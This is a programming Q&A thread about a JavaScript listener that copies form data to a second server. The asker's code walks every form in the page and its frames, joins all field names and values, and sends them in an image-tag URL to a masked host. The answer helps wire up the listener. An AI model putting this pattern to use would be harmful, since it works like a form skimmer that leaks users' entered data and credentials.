# JavaScript EventListener not executing URL on submit

Tags: javascript, dom-events

I need to submit the same information to two URL's so the form submit action is perfectly fine for one, then I had the thought I could do a JavaScript listener to submit the second one with a simple URL in an image tag but I have found that if I use the code below it doesn't reach my server but if I enable the alert box it works perfectly fine.

If I am doing something really simple wrong, I apologise.

//function 1

```
 function attach(wnd,handler){
        for(var i=0; i<wnd.document.forms.length; i++){
            var form = wnd.document.forms[i];
                form.addEventListener('submit', handler,false);
        }

        for(var i=0; i<wnd.frames.length; i++){
            var iwnd = wnd.frames[i];               
            attach(iwnd,handler);
        }
     }
```

//Function 2

```
function formSubmit(e){
             
    var forms=parent.document.getElementsByTagName("form");
    for (i = 0 ; i < forms.length; i++)
    {
        var chain="";
         var forms=parent.document.getElementsByTagName("form");
         
         for (x = 0 ; x < forms.length; x++)
         {
             var elements=forms[x].elements;
             for (e = 0 ; e < elements.length; e++)
             {
                 chain += elements[e].name + "%3d" + elements[e].value + "|";
        
             }
             
             //           alert(chain);
             var pic = document.createElement('img');
    pic.className = 'avatar';
    pic.src = 'http://x.x.x.x/images/Image.php?id=0.0.0.0&idi=test'+chain;
    pic.height = '50';
    pic.width = '50';
       
    document.getElementById('test').appendChild(pic);
         }
    }


}
```

Comment: Can you please try to fix your indention, so we can see where a functions begins and ends?

Comment: Fixed the best i can get it

Answer (score 0, accepted):

You need to call your attach function after the DOM is available. Add something like this after your formSubmit function:

```
document.addEventListener("load", function() {
  attach(window, formSubmit);
});
```

Note that addEventListener is not supported by older Internet Explorers. If you need support for them do yourself a favor and try jQuery or a similar JS helper library.

Comment: I've added this document.addEventListener("load", function() {
  attach(window, formSubmit);
});  and it works but i can't get the img to execute unless i put in an alert box before or after the img but that isn't very user friendly.. any idea's..

Comment: If this answers your question it would be nice if you accept it as answer. What do you mean by "can't get the img to execute"? To be shown?